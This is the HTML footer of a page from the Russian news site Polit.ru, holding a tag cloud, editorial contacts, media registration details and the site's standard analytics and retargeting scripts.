  <a href="/tag/Jupiter/" class="weight4">Юпитер</a>
  

  

  
  <a href="/tag/nuclear_physics/" class="weight7">ядерная физика</a>
  

  
  <a href="/tag/language/" class="weight8">язык</a>
  

  

  

</div>



  <div class="archive-calendar"><a href="/rubric/proscience/archive/">Архив</a></div>
  <script type="text/javascript">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</script>

<div id="politcal"></div>

<script charset="utf-8" src="/static/polit/js/politcal.js" type="text/javascript"></script>

  



	    
</div>

      
    
  
  </div>




    <!--BEGIN #footer-->

    <!--BEGIN #footer-->
    <div style="margin: 15px 0 25px;">
      <!--LiveInternet counter--><script type="text/JavaScript"><!--
        document.write('<a href="http://www.liveinternet.ru/click" target=liveinternet rel="nofollow"><img src="//counter.yadro.ru/hit?t45.6;r'+
          escape(document.referrer)+((typeof(screen)=='undefined')?'':';s'+screen.width+'*'+screen.height+'*'+(screen.colorDepth?
          screen.colorDepth:screen.pixelDepth))+';'+Math.random()+'" border=0 width=31 height=31 alt="liveinternet.ru"></a>')
      //--></script><!--/LiveInternet-->
    </div>
    <div class="info-container stop">
      <div class="first">
        <h4 class="subject block-subject"><a href="/rubric/redakciya/" rel="nofollow" style="color:#FFF;">Редакция</a></h4>
        Электронная почта: <a href="mailto:politru.edit1@gmail.com" rel="nofollow">politru.edit1@gmail.com</a>
        <br/>
        Адрес: 129090, г. Москва, Проспект Мира, дом 19, стр.1, пом.1, ком.5
        <br/>
        Телефон: +7 495 980 1894.
        <br/>

        <!-- Yandex.Metrika informer -->
        <a href="https://metrika.yandex.ru/stat/?id=5421865&amp;from=informer"
           target="_blank" rel="nofollow"><img src="https://metrika-informer.com/informer/5421865/3_1_FFFFFFFF_EFEFEFFF_0_pageviews"
           style="width:88px; height:31px; border:0;" alt="Яндекс.Метрика" title="Яндекс.Метрика: данные за сегодня (просмотры, визиты и уникальные посетители)"
           class="ym-advanced-informer" data-cid="5421865" data-lang="ru" /></a>
        <!-- /Yandex.Metrika informer -->

        <!-- Yandex.Metrika counter -->
        <script type="text/javascript" >
            (function (d, w, c) {
                (w[c] = w[c] || []).push(function() {
                    try {
                        w.yaCounter5421865 = new Ya.Metrika({
                            id:5421865,
                            clickmap:true,
                            trackLinks:true,
                            accurateTrackBounce:true,
                            webvisor:true
                        });
                    } catch(e) { }
                });

                var n = d.getElementsByTagName("script")[0],
                    s = d.createElement("script"),
                    f = function () { n.parentNode.insertBefore(s, n); };
                s.type = "text/javascript";
                s.async = true;
                s.src = "https://cdn.jsdelivr.net/npm/yandex-metrica-watch/watch.js";

                if (w.opera == "[object Opera]") {
                    d.addEventListener("DOMContentLoaded", f, false);
                } else { f(); }
            })(document, window, "yandex_metrika_callbacks");
        </script>
        <noscript><div><img src="https://mc.yandex.ru/watch/5421865" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
        <!-- /Yandex.Metrika counter -->
      </div>
      <div class="agelimit"></div>
      <div class="second">
        Свидетельство о регистрации средства массовой информации<br/>
        Эл. № 77-8425 от 1 декабря 2003г. Выдано министерством<br/>
        Российской Федерации по делам печати, телерадиовещания и<br/>
        средств массовой информации.
        Выходит с 21 февраля 1998 года.<br/>
        При любом использовании материалов веб-сайта ссылка на Полит.ру обязательна.<br/>
        При перепечатке в Интернете обязательна гиперссылка <a href="/">polit.ru</a>.<br/>
        Все права защищены и охраняются законом.<br/>
        © Полит.ру, 1998–2014<a rel="nofollow" href="/purge/news/2017/11/07/ps_diurnal_mammals/" style="text-decoration: none; color: #FFFFFF;">.</a>
      </div>
    </div>
    <div class="black-bottom stop">

    </div>
  </div>


	


    <!--END #footer-->
  <script type="text/javascript">
    (window.Image ? (new Image()) : document.createElement('img')).src = location.protocol + '//vk.com/rtrg?r=DWczk9hWeAvkw4Spq8D4hz2w1MfxfpmDx/ZgQHRFD0o641mnFqVMc*QV8joivbZSsPA/URYGFFIRCucM8ibEezf2AYNfSVMgaMW2N1cgx/flht*xh7XqKekOJqgAXuZvzaemjUVvGkCuk5jEUkCi*4*H82g4/Y64rYb2Itn*pT0-';
    load_banners();
  </script>
</body>
</html>

